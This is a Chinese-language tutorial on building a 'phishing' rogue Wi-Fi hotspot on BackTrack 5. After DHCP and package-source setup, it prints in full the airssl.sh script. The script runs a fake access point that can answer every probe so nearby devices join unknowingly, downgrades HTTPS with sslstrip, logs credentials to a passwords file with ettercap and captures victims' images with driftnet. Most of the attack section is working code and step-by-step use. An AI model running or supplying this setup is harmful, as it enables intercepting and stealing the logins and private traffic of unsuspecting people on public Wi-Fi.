Back Track5下建立“钓鱼”热点测试

 Back Track下建立“钓鱼”热点测试

1、 配置静态IP(可以不做）

修改/etc/network/interfaces文件

auto eth0
iface eth0 inet static
address 192.168.3.100
gateway 192.168.3.1
netmask 255.255.255.0

重新加载网卡。

root@bt:~# /etc/init.d/networking restart

1、 修改源列表，理由：解决apt-get命令使用时碰到的奇怪问题。

首先备份源列表

sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup

修改/etc/apt/sources.list

刷新列表:

sudo apt-get update

备注：最新源列表见：http://wiki.ubuntu.org.cn/%E6%BA%90%E5%88%97%E8%A1%A8

或：

(1 。打开 /etc/apt/sources.list 这个路径 找到sources.list 文件 然后用编辑器编辑
2 。把以下代码复制到sources.list 原来的要覆盖哈
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing

最后在终端运行 apt-get update

然后就是等来 一路选择YES)

3、安装sslstrip 

进入/pentest/web/sslstrip目录，执行安装命令：

python setup.py install

4、DHCP的安装与配置：

安装 dhcp3 服务器:sudo apt-get install dhcp3-server

配置 dhcp3 服务，文件/etc/dhcp3/dhcpd.conf，根据自己实际情况来修改文件。

subnet 192.168.3.0 netmask 255.255.255.0 {
range 192.168.3.60 192.168.3.100;
option domain-name-servers ns1.internal.example.org;
option domain-name "internal.example.org";
option routers 192.168.3.1;
option broadcast-address 192.168.3.100;
default-lease-time 600;
max-lease-time 7200;
}

重新启动服务sudo /etc/init.d/dhcp3-server restart

更改 dhcp3 服务监听的网卡，修改/etc/default/dhcp3-server文件

INTERFACES="eth0"

找一台机器试试可以获取DHCP服务IP地址波

5、建立AP热点 

到root目录下创建air文件夹

在以airssl.sh文件名，创建一个文件，以下是airssl.sh文件里面的内容：

#!/bin/bash
# ©opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /pentest/wireless/airssl/dhcpd.conf

# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "

read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3

# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2

# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit

fi
exit

为airssl.sh添加执行权限

root@bt:~/air# chmod 777 airssl.sh

最后执行airssl.sh文件。再执行(相关输入) 

root@bt:~/air# ./airssl.sh

输入出口的网关地址,列如我的网关地址是：192.168.3.1 回车。

输入那个可以连接互联网的接口，列如我的是：eth0回车。

创建AP热点使用的接口，列如我的是：wlan0  回车。

创建AP热点的ESSID，就是你共享无线的名字，列如我的是：youku  回车。

自己翻译，输入n 回车。

会跳出此界面

自己翻译，输入n 回车。

又多一个Ettercap

自己翻译，输入y 回车。

多了一个driftnet

找一部手机来测试一下。

可以连接到“youku”这个无线。

 链接: http://pan.baidu.com/s/1c05vHM4

 密码: 4h3 

补充:

开启无线监控：airmon-ng start wlan0 

软件源:

#将下列地址复制进去就好 
deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib 
deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib 
deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free 
#然后我们导入公钥 
sudo apt-key adv --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6 
#之后我们更新一下， 
apt-get update

上面这个是中科大的软件源

下面给出软件源的列表

中科大软件源

deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib 
deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib 
deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free

kali官方源的地址： 
deb http://http.kali.org/kali kali main non-free contrib 
deb-src http://http.kali.org/kali kali main non-free contrib 
deb http://security.kali.org/kali-security kali/updates main contrib non-free

kali新加坡源的地址： 
deb http://mirror.nus.edu.sg/kali/kali/ kali main non-free contrib 
deb-src http://mirror.nus.edu.sg/kali/kali/ kali main non-free contrib 
deb http://security.kali.org/kali-security kali/updates main contrib non-free 
deb http://mirror.nus.edu.sg/kali/kali-security kali/updates main contrib non-free 
deb-src http://mirror.nus.edu.sg/kali/kali-security kali/updates main contrib non-free

kali国内源的地址： 
deb http://ftp.sjtu.edu.cn/debian wheezy main non-free contrib 
deb-src http://ftp.sjtu.edu.cn/debian wheezy main non-free contrib 
deb http://ftp.sjtu.edu.cn/debian wheezy-proposed-updates main non-free contrib 
deb-src http://ftp.sjtu.edu.cn/debian wheezy-proposed-updates main non-free contrib 
deb http://ftp.sjtu.edu.cn/debian-security wheezy/updates main non-free contrib 
deb-src http://ftp.sjtu.edu.cn/debian-security wheezy/updates main non-free contrib 
deb http://mirrors.163.com/debian wheezy main non-free contrib 
deb-src http://mirrors.163.com/debian wheezy main non-free contrib 
deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib 
deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib 
deb http://mirrors.163.com/debian-security wheezy/updates main non-free contrib

我们最好使用中科大或者国内的！

eth0:inet addr:192.168.138.129   bcast:192.168.138.255  mask:255.255.255.0

subnet 192.168.232.0 netmask 255.255.255.0 {
range 192.168.232.60 192.168.232.255;
option domain-name-servers ns1.internal.example.org;
option domain-name "internal.example.org";
option routers 192.168.232.2;
option broadcast-address 192.168.232.255;
default-lease-time 600;
max-lease-time 7200;
}